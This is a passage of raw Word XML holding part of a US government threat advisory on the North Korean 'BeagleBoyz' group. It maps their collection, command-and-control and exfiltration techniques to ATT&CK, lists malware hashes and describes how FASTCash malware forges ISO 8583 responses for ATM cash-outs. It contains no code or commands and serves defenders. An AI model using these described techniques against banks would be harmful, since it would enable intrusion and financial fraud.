        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use automated methods, such as scripts, for collecting data (Automated Collection [T1119])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDFA41C" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Capture user input to obtain credentials and collect information (Input Capture [T1056])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A792AD" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Collect local systems data from a compromised system (Data from Local System [T1005])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2BBC9" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Take screen captures of the desktop (Screen Capture [T1113])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CCC6AE" w14:textId="4FD0F32D" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Collect data stored in the Windows clipboard from users (Clipboard Data [T1115])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D61AA" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRPr="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00347BA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Command and Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208BD7B" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> likely change tools—such as CROWDEDFLOUNDER and HOPLIGHT—over time to maintain remote access to financial institution networks and to interact with those systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3459ED54" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="78F27A97" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t xml:space="preserve">Analysis of the following CROWDEDFLOUNDER samples was first released in October 2018 as part of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> campaign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0955F336" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="416017F0" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t>MD5 hash: 5cfa1c2cb430bec721063e3e2d144feb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E832A4E" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t>MD5 hash: 4f67f3e4a7509af1b2b1c6180a03b3e4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FABD31" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="3638C5E3" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used CROWDEDFLOUNDER as a remote access trojan (RAT) since at least 2018. The implant is designed to operate on Microsoft Windows hosts and can upload and download files, launch a remote command shell, inject into victim processes, obtain user and host information, and securely delete files. The implant may be packed with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Themida</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to degrade or prevent effective reverse engineering or evade detection on a Windows host. It can be set to act in beacon or listening modes, depending on command line arguments or configuration specifications. The implant obfuscates network communications using a simple encoding algorithm. The listening mode of CROWDEDFLOUNDER facilitates proxies like ELECTRICFISH (discussed below) with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> traffic in a victim’s network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C5B13" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="640EB7ED" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t xml:space="preserve">More recently, the U.S. Government has found HOPLIGHT malware on victim systems, suggesting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are using HOPLIGHT for similar purposes. HOPLIGHT has the same basic RAT functionality as the CROWDEDFLOUNDER implant. In addition, HOPLIGHT has the capability to create fraudulent Transport Layer Security (TLS) sessions to obfuscate command and control (C2) connections, making detection and tracking of the malware’s communications difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B2D8A4" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="1F2DC161" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t>Full technical reports for CROWDEDFLOUNDER and HOPLIGHT are available at https://us-cert.cisa.gov/northkorea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396069C0" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="42C5B77A" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use network proxy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tools—including VIVACIOUSGIFT and ELECTRICFISH—to tunnel communications from non-internet facing systems like an ATM switch application server or a SWIFT terminal to internet-facing systems. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use these network proxy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tools, likely placed at or near a victim’s network boundary, to tunnel other protocols such as RDP and Secure Shell or other implant traffic out from the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C9D29" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="02C5FF92" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t xml:space="preserve">It appears that as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> change proxy tools, there is some overlap between their use of older and newer malware. For example, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> appear to have begun using ELECTRICFISH as they wound down use of VIVACIOUSGIFT. There has been a noticeable decline in ELECTRICFISH use following the U.S. Government’s disclosure of it in May 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA3712" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="344F5568" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t>Full technical reports for VIVACIOUSGIFT and ELECTRICFISH are available at https://us-cert.cisa.gov/northkorea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C332A" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="3793CEC1" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In addition to these tools, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used the following techniques to communicate with financial institution victim systems under their control (Command and Control [TA0011]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F80E7" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="1CB10000" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employ known encryption algorithms to conceal C2 traffic (Encrypted Channel [T1573])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D59D0EC" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Communicate over commonly used standard application layer protocols and ports to avoid detection or detailed inspection and to blend with existing traffic (Application Layer Protocol [T1071])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B0CE2C" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encode C2 information using standard data encoding systems such as the American Standard Code for Information Interchange (ASCII), Unicode, Base64, Multipurpose Internet Mail Extensions, and 8-bit Unicode Transformation Format systems or other binary-to-text and character encoding systems (Data Encoding: Standard Encoding [T1132.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE218B1" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Copy files between systems to stage adversary tools or other files (Ingress Transfer Tool [T1105])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DA2CAC" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use external previously compromised web services to relay commands to victim systems (Web Service [T1102])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F08B51" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Employ a custom C2 protocol that mimics well-known protocols, or develop custom protocols (including raw sockets) to supplement protocols provided by another standard network stack (Non-Application Layer Protocol [T1095])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D6B2E" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Obfuscate C2 communications (but not necessarily encrypt them) to hide commands and make the content less conspicuous and more challenging to discover or decipher (Data Obfuscation [T1101])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A5ABDD" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employ connection proxies to direct network traffic between systems, act as an intermediary for network communications to a C2 server, or avoid direct connections to its infrastructure (Proxy [T1090])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DECD3" w14:textId="5B74A1F9" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit legitimate desktop support and remote access software to establish an interactive C2 channel to target systems within networks (Remote Access Software [T1219])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E255C" w14:textId="77777777" w:rsidR="00FA6A0A" w:rsidRPr="00FA6A0A" w:rsidRDefault="00FA6A0A" w:rsidP="00FA6A0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C04C0" w14:textId="77777777" w:rsidR="00FA6A0A" w:rsidRDefault="00FA6A0A" w:rsidP="00FA6A0A">
      <w:r>
        <w:t xml:space="preserve">During a cyber operation, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> need to exfiltrate a variety of data from compromised systems. In addition to the C2 tools noted that have built-in exfiltration features, such as CROWDEDFLOUNDER and HOPLIGHT, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use the following techniques to steal data from a network (Exfiltration [TA0010]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F1AC8" w14:textId="77777777" w:rsidR="00FA6A0A" w:rsidRDefault="00FA6A0A" w:rsidP="00FA6A0A"/>
    <w:p w14:paraId="18234D1D" w14:textId="77777777" w:rsidR="00FA6A0A" w:rsidRDefault="00FA6A0A" w:rsidP="00FA6A0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compress and encrypt collected data before exfiltration to minimize the amount of data sent over the web and make it portable, less conspicuous, and less detectable (Archive Collected Data [T1560])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D521EF0" w14:textId="77777777" w:rsidR="00FA6A0A" w:rsidRDefault="00FA6A0A" w:rsidP="00FA6A0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Steal collected data via scripts (although this may require other exfiltration techniques) (Automated Exfiltration [T1020])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2476C08D" w14:textId="1F637645" w:rsidR="00FA6A0A" w:rsidRDefault="00FA6A0A" w:rsidP="00FA6A0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encode data using the same protocol as the C2 channel and exfiltrate it over the C2 channel (Exfiltration Over C2 Channel [T1041])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696F61F" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRPr="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E5EB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586CC366" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:r>
        <w:t xml:space="preserve">The U.S. Government has observed the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> successfully monetize illicit access to financial institutions’ SWIFT terminals to enable wire fraud and gain access to the institutions’ payment switch application servers, which allowed fraudulent ATM cash outs. After gaining access to either one or both of these operationally critical systems, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> monitor the systems to learn about their configurations and legitimate use patterns, and then they deploy bespoke tools to facilitate illicit monetization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F910C79" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="5A9877CA" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:r>
        <w:t xml:space="preserve">The cybersecurity community and Financial Services sector have released substantial information on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> manipulation of compromised SWIFT terminals, describing their ability to monitor these systems, send fraudulent messages, and attempt to hide the fraudulent activity from detection. The discussion below focuses on the custom tools used to manipulate payment switch applications for ATM cash outs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26386790" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="5CE9B75C" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> malware to intercept financial request messages and reply with fraudulent but legitimate-looking affirmative response messages in the ISO 8583 format. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have functionally equivalent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> malware for both UNIX and Windows that they deploy depending on the operating system running on the server hosting the bank’s payment switch application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C192B" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="6FCE4ACE" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for UNIX is composed of AIX executable files designed to inject code and libraries into a currently running process. One AIX executable provides export functions, which allows an application to manipulate transactions on financial systems using the ISO 8583 international standard for financial transaction card-originated interchange messaging. The injected executables interpret financial request messages and construct fraudulent financial response messages. For more details on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for UNIX malware, please see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> report at https://www.us-cert.gov/ncas/alerts/TA18-275A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5818A5EA" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="44A1DD32" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Windows to manipulate transactions processed by a switch application running on a Windows box. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Windows is also specific to the ISO 8583 message format. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> appear to have modified publicly available source code to write parts of the tool, likely to speed development. The malware contains code probably taken from open-source repositories on the internet to create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashmaps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and hook functions and to parse ISO 8583 messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AFA32E" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="3D13D149" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Windows injects itself into software running on a Windows platform. The malware then takes control of the software’s network send and receive functions, allowing it to manipulate ISO 8583 messages. The U.S. Government has identified two variants of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Windows. One variant supports ASCII encoding. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> appear to have modified the second variant’s message parsing code to support Extended Binary Coded Decimal Interchange Code (EBCIDC) encoding. Both ASCII and EBCDIC are character encoding formats.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50B27D" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="7EDC3E7F" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Windows malware uses code from github.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>petewarden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>c_hashmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashmaps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, code from Microsoft's Detours Library at github.com/Microsoft/Detours for hooking, and code from to parse ISO 8583 messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62568D37" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="2D745338" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:r>
        <w:t xml:space="preserve">The malware hooks onto the send and receive function of the switch application so that it can process inbound request messages as they are received. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Windows inspects the inbound message, probably looking for specific account numbers. If the account number matches an expected number, the malware constructs a fraudulent response message. If the account number does not match an expected number, the malware allows the request to pass through normally. If the malware constructs a fraudulent response message, it then sends it back to the acquirer without any further processing by the switch application, leaving the issuer without any awareness of the fraudulent transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A955D2" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="154E4843" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:r>
        <w:t xml:space="preserve">Full technical reports for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
